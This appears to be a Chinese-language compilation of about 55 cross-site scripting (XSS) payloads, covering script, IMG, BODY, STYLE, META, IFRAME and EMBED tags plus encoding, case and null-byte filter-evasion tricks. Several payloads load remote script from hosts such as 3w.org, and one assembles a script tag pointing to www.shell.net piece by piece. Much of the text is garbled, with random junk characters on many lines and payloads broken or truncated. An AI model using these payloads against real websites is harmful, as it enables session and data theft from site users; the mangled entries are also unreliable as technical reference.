XSS攻击汇总

admin

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(99)另类弹框
! N4 r% y  |( e- u5 R$ f/ }<q/oncut=alert()>1
<s/onclick=alert()>b
6 h3 x! \- {# \2 z. J <XSS=" onclick="alert(1)//">clickme</SSX=">
# C3 N& o# K% s+ k, w& S( ~ <zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
) `3 t; Q$ B. l" E# P) ]( R<a=">clickme</a=">
! o2 W$ w/ F8 E- D. p: A# ]- ?! R8 K<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
- G: D* T/ C. M' P* u" W<IMG SRC=javascript:alert(‘XSS’)>

4 y- Y: d3 M# p( b5 r) g- E& c# E5 o(4)IMG标签大小写不敏感
4 x& S2 F$ B0 O1 k: {5 N) c4 M<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 @% t% \; R! S* d
$ i2 w, Q4 Y3 @6 [7 e4 a(5)HTML编码(必须有分号)
" T! E, A8 P- g( h<IMG SRC=javascript:alert(“XSS”)>
5 W! {3 q. X( m: [. B
(6)修正缺陷IMG标签
8 [. C6 C3 L$ X' N: O+ Z! v<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- z' m8 q5 v: f# A" d
5 M: O$ }& J9 Q3 @: T9 A; ](7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>
9 m/ |: z( ?5 |0 l3 B8 v% w
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
! I1 ~6 o4 E  x/ T9 O! Q
% ^" K& v+ ?1 G# C# O. J(10)十六进制编码也是没有分号(计算器)
<IMG SRC=\'#\'" /span>

(11)嵌入式标签,将Javascript分开
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
; [" h  X) C; J+ k& z. I4 o* C' ^
(12)嵌入式编码标签,将Javascript分开
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(13)嵌入式换行符
5 t8 h* o) D+ C<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 W* t- }. p. R" v" _$ e
(14)嵌入式回车
0 I8 H3 L3 n9 E- d+ `$ f5 b<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

1 c$ h! Y3 c% G" g& H2 B(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=\'#\'" /span>

8 c2 ]4 G4 b! s(16)解决限制字符(要求同页面)
. q3 G+ _4 P) o* [0 \/ u) ]<script>z=’document.’</script>
* ]. l7 A/ D4 `0 \6 Y/ a<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
' C- t! E" j: v/ x! F$ A<script>z=z+’tp://ww’</script>
9 n8 h' i% e/ z, j$ E<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
" Z( W! g4 f' M/ w6 E6 u<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>

(17)空字符
6 @& w) q) y, a0 z( v( ~, Z  D  ]7 s# [perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
7 F$ |. i( d& t8 L
* @4 x) @, N( i: V% b(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 m6 n$ C0 q6 ]8 D. R: \( f
' ]0 |0 F  o( d/ _- |(19)Spaces和meta前的IMG标签
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS
/ P! H( k7 ^! U  c0 L" D<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
' @( U$ J! }' G  o  y9 n5 d1 O0 ]
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

# c2 a3 ?) V+ }/ w! g  c(22)Non-alpha-non-digit XSS to 3
& f6 a" O3 j9 I1 u<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>

4 f) K  {6 a* v+ `# a(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)
! A+ [9 Y7 O' }" w<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- e* ?- s3 y+ |
; c3 H; t9 r3 ?) X8 _- c8 K; c  h- N(25)无结束脚本标记2
: Z' j8 f9 P# v* W<SCRIPT SRC=//3w.org/XSS/xss.js>
! _6 f# q; Z3 h1 {
(26)半开的HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

2 D+ s0 g# U& o+ \(27)双开角括号
( l' p# Q7 j3 X1 J9 C* J1 G<iframe src=http://3w.org/XSS.html <
% |5 z1 v5 q+ i9 F: e7 s5 V* a
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
3 c/ {7 ?+ Y5 t1 C; k% w# R6 ]% n
(29)换码过滤的JavaScript
  {0 V! r; W: c# r8 j\”;alert(‘XSS’);//
: F4 f0 \, _/ J: |
(30)结束Title标签
* M9 H$ v% o. l: O</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

(31)Input Image
5 N7 u1 n( I/ w6 ^$ E- @+ F5 O0 e- }<INPUT SRC=\'#\'" /span>

(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

: L- }; J5 [2 F(33)BODY标签
/ u5 j6 g2 e3 R9 P* J3 ~<BODY(‘XSS’)>
7 @! O, v4 i2 b. A7 t6 p
(34)IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

/ a9 D6 s) P3 m) j(35)IMG Lowsrc
2 o. T% o( a& h0 B& i<IMG LOWSRC=\'#\'" /span>
% Q6 z% ]" j0 Q) O
2 U) w2 A( D& O. N(36)BGSOUND
<BGSOUND SRC=\'#\'" /span>
, {: X* {3 x1 q* O& G
" t9 k% f' G& v6 U, l: H# T(37)STYLE sheet
  }) N! `3 i+ e: x<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
7 y5 A3 p$ L) }3 }
( f; {* E7 t, w$ I" Z# [$ C6 s(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

0 ~9 G. U. x3 ?& T(39)List-style-image(列表式)
" @/ M) _' G$ L7 A6 y<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

(40)IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

6 m8 F; N7 w2 R% O! Z. k' [(41)META链接url
% e# R: ^& A; m, Y( L) I<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>

(42)Iframe
& ]/ |  y$ x% k8 P7 f  U<IFRAME SRC=\'#\'" /IFRAME>

(43)Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

8 ]6 H8 Q$ [7 ]: u, |- p(44)Table
: N3 m$ F8 u: I3 A6 Y' `! Z<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
' |5 D; W4 Z, B) Y
(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
% F8 F2 ], O- x: W2 g) [0 I9 y
6 X; K8 c/ i. _& w/ ^, m(46)DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

9 A) `9 o  |7 H. b7 L! x: n$ H(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
) h& Y8 _  }% E1 Y, z- j3 d: u. d<DIV STYLE=”background-image: url(
javascript:alert(‘XSS’))”>
+ x" j" p# A7 w' F! w7 k3 T
% ^+ L6 Q: N: f# o7 U) I. g" f  D(48)DIV expression
1 c5 A$ `; H2 s3 i2 o<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
2 P7 j& m9 I5 f4 x
(49)STYLE属性分拆表达
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

(51)STYLE background-image
- `( K# g/ j  L<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

8 T& }4 r  m" n# O6 `(52)IMG STYLE方式
exppression(alert(“XSS”))’>
% v" P3 S- ^2 r3 Y5 V
(53)STYLE background
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

  |8 x0 [  N  s! D# b; X(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>

: x0 r' ~! e) W# n" L(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
' L  K: h. T3 A) Y- V<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>